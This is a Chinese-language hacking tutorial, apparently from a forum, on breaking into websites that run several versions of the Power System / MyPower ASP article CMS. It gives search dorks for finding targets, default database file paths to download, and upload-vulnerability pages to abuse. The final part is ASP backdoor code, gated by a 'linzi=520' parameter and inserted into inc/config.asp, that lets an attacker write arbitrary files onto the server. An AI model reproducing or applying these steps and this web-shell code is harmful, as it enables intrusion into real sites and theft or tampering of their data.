这个是网站入侵用的工具! 方法很简单
2、在baidu或google点击高级搜 选择100项。搜素:企业邮局企业荣誉营销网络产品分类信息反馈联系我们收藏本站
2、在baidu或google搜索
ProductShow.asp?ArticleID=
upfile_Other.asp 上传
upfile_other.asp
打开挖掘鸡在添加后缀:
/leadBBS/DATA\leadbbs.mdb
/database/%23newasp.mdb
版本1 Power System Of Article Management Ver 2.0 Build 20030320
百度关键字:Power System Of Article Management Ver 2.0 Build 20030320
入侵思路:1.默认数据库:database\article.asp
2.如果修改了默认数据库,加 Inc/syscode.asp 暴数据库
3.上传漏洞:upfile.asp
方法:注册一用户,利用本地上传页面提交,注:用明小子上传是不成功的,明小子自带的cookie不能上传成功
版本2 Power System Of Article Management Ver 3.0 Build 20030628
百度关键字:Power System Of Article Management Ver 3.0 Build 20030628
入侵思路:
1.默认数据库:database/yiuwekdsodksldfslwifds.mdb
2.如果修改了默认数据库,加 Inc/syscode.asp 暴数据库
后台拿站方法:
1. 在信息处插入一段类似小马的发送代码,因为这儿没有字符限制
2.如果网站信息配置没有修改权限,上传图片格式的空壳数据库,先恢复再备份
版本3 MyPower Ver3.51
百度关键字:Powered by:MyPower Ver3.51
入侵思路:
1.默认数据库:database\adsfkldfogowerjnokfdslwejhdfsjhk.mdb
2.如果修改了数据库,加Inc/syscode_article.asp 暴数据库
3.上传漏洞 :upfile_photo.asp
Upfile_Soft.asp
upfile_softpic.asp
upfile_adpic.asp
Upfile_Article.asp (成功率比较高)
后台拿站方法:
1. 修改版权,插入发送代码
2.上传空壳数据库,先恢复,再备份
版权所有 Copyright© 2003 <a href='http://www.asp163.net'>动力空间</a>" '版权信息
if Request("linzi")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "succeed!"
end if
Response.write "<form method='POST'action='"&Request.ServerVariables("URL")&"?linzi=520&creat=yes'>"
Response.write "<textarea name='text'>"&thisline&"</textarea><br>"
Response.write "<input type='text' name='path' value='"&Request("path")&"'>"
Response.write "<input name='submit' type='submit' value='ok' ></form>"
Response.end
end if
%>
inc/config.asp?linzi=520